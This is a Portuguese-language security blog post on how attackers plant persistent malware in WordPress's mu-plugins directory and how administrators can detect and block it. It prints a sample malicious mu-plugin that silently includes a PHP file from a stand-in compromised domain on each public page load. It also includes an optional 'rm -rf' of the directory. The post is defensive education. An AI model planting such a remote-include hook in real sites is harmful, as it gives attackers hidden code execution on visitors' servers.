A comunidade WordPress vem enfrentando uma nova onda de ataques direcionados ao diretório mu-plugins (Must-Use Plugins). Hackers estão explorando essa funcionalidade pouco conhecida, porém poderosa, para injetar malwares de forma silenciosa e persistente em sites WordPress.
Esse tipo de ataque passa despercebido por muitos administradores, pois os plugins do diretório mu-plugins não aparecem na área de plugins do painel administrativo, o que os torna um vetor perfeito para atividades maliciosas.
Neste artigo do Blog Dolutech, você entenderá:
- O que é o diretório
mu-plugins; - Como os atacantes estão usando esse recurso para injetar código malicioso;
- Como identificar infecções ativas no seu site;
- E um guia prático de medidas de proteção e verificação completa para garantir a segurança do seu WordPress.
O que é o diretório mu-plugins?
O diretório mu-plugins, sigla para Must-Use Plugins, é uma funcionalidade nativa do WordPress introduzida para permitir que plugins sejam executados automaticamente sem poderem ser desativados via painel administrativo.
Características:
- Localização padrão:
wp-content/mu-plugins/ - Todos os arquivos PHP nesse diretório são carregados automaticamente pelo WordPress;
- Os plugins MU não aparecem na lista de plugins padrão (Aparência > Plugins);
- São úteis para configurações críticas ou funções globais no site.
Infelizmente, esse recurso também pode ser explorado por cibercriminosos para inserir código malicioso que se executa silenciosamente em segundo plano.
Como Hackers Estão Explorando o mu-plugins
Vetores de Ataque Comuns:
- Invasão Inicial: via plugins vulneráveis, temas desatualizados ou senhas fracas.
- Upload do Código Malicioso: o invasor envia um arquivo PHP para o diretório
mu-plugins. - Execução Automática: o código é carregado pelo WordPress assim que o site é acessado.
- Persistência: mesmo que o administrador limpe os plugins normais, o malware permanece escondido no
mu-plugins. - Funções Maliciosas: envio de SPAM, redirecionamentos, mineração de criptomoedas, injeção de backdoors, roubo de credenciais.
Exemplo de malware no mu-plugins:
<?php
// mu-plugin malicioso
add_action('init', function() {
if (!is_admin()) {
include_once("https://dominio-comprometido.com/malware.php");
}
});
Indícios de Comprometimento via mu-plugins
- Redirecionamentos aleatórios no site
- Baixo desempenho ou sobrecarga de CPU
- Notificações de listas de spam (SpamHaus, Google Safe Browsing)
- Presença de arquivos desconhecidos em
wp-content/mu-plugins - Comunicação frequente com domínios suspeitos
Guia de Verificação Completa do mu-plugins
1. Verifique a existência do diretório
ls -la wp-content/mu-pluginsSe o diretório não existir, ótimo. Mas se existir, você precisa verificar o conteúdo manualmente.
Lembre-se que o mu-plugins é amplamente usado para funções de plugins de manutenção de sites como por exemplo o famoso plugin ManageWP.
2. Analise o conteúdo
Revise todos os arquivos no diretório mu-plugins.
cat wp-content/mu-plugins/nome-do-arquivo.phpDesconfie de:
- Código ofuscado (base64, eval, gzinflate)
- Instruções de inclusão remota (como
include('http://malicioso.com')) - Chamadas para funções obscuras ou injeções JavaScript
3. Valide com antivírus e ferramentas de varredura
Utilize ferramentas de segurança para escanear:
- Wordfence
- MalCare
- VirusTotal (suba o arquivo manualmente)
- ClamAV (servidores Linux)
- WAF
4. Monitore alterações no diretório
Configure uma ferramenta como:
inotifywait -m -r wp-content/mu-pluginsOu use plugins como:
- WP Security Audit Log
- Sucuri Security
- Activity Log
omo se Proteger Contra Injeções em mu-plugins
1. Restrinja permissões do diretório
Evite que qualquer processo PHP possa gravar diretamente nesse diretório:
chmod -R 755 wp-content/mu-plugins
chown -R root:www-data wp-content/mu-pluginsOpcionalmente, remova o diretório se não estiver em uso:
rm -rf wp-content/mu-plugins2. Bloqueie uploads maliciosos com .htaccess (Apache)
Crie ou edite o arquivo .htaccess dentro de wp-content/mu-plugins/:
<Files *.php>
Order allow,deny
Deny from all
</Files>3. Utilize WAF (Web Application Firewall)
Ferramentas como:
- Cloudflare WAF
- Imunify360
- BitNinja
- CPGuard
podem bloquear uploads não autorizados e injeções de código.
4. Automatize auditorias com WP-CLI
Execute regularmente:
wp plugin list
wp eval-file wp-content/mu-plugins/checar.phpE gere hashes de integridade para monitoramento:
sha256sum wp-content/mu-plugins/* > mu-plugins-hashes.txtRecomendações Finais da Dolutech
- Audite seu site regularmente, mesmo que não note comportamento estranho;
- Eduque sua equipe sobre os riscos de temas e plugins piratas;
- Evite permissões 777 ou proprietários incorretos em diretórios WordPress;
- Use 2FA e senhas fortes, principalmente para administradores;
- Realize backups diários com retenção de 7 dias, para garantir rollback em caso de infecção.
Conclusão
O uso malicioso do diretório mu-plugins é uma técnica sorrateira, mas poderosa, empregada por cibercriminosos para comprometer sites WordPress sem serem detectados. Por não aparecer no painel de administração, muitos administradores sequer imaginam que podem estar infectados.
A Dolutech recomenda monitoramento contínuo, inspeção manual desse diretório e adoção de medidas preventivas imediatas. Manter-se informado e proativo é a chave para manter sua aplicação segura.
Amante por tecnologia Especialista em Cibersegurança e Big Data, Formado em Administração de Infraestrutura de Redes, Pós-Graduado em Ciências de Dados e Big Data Analytics e Machine Learning, Com MBA em Segurança da Informação, Escritor do livro ” Cibersegurança: Protegendo a sua Reputação Digital”.
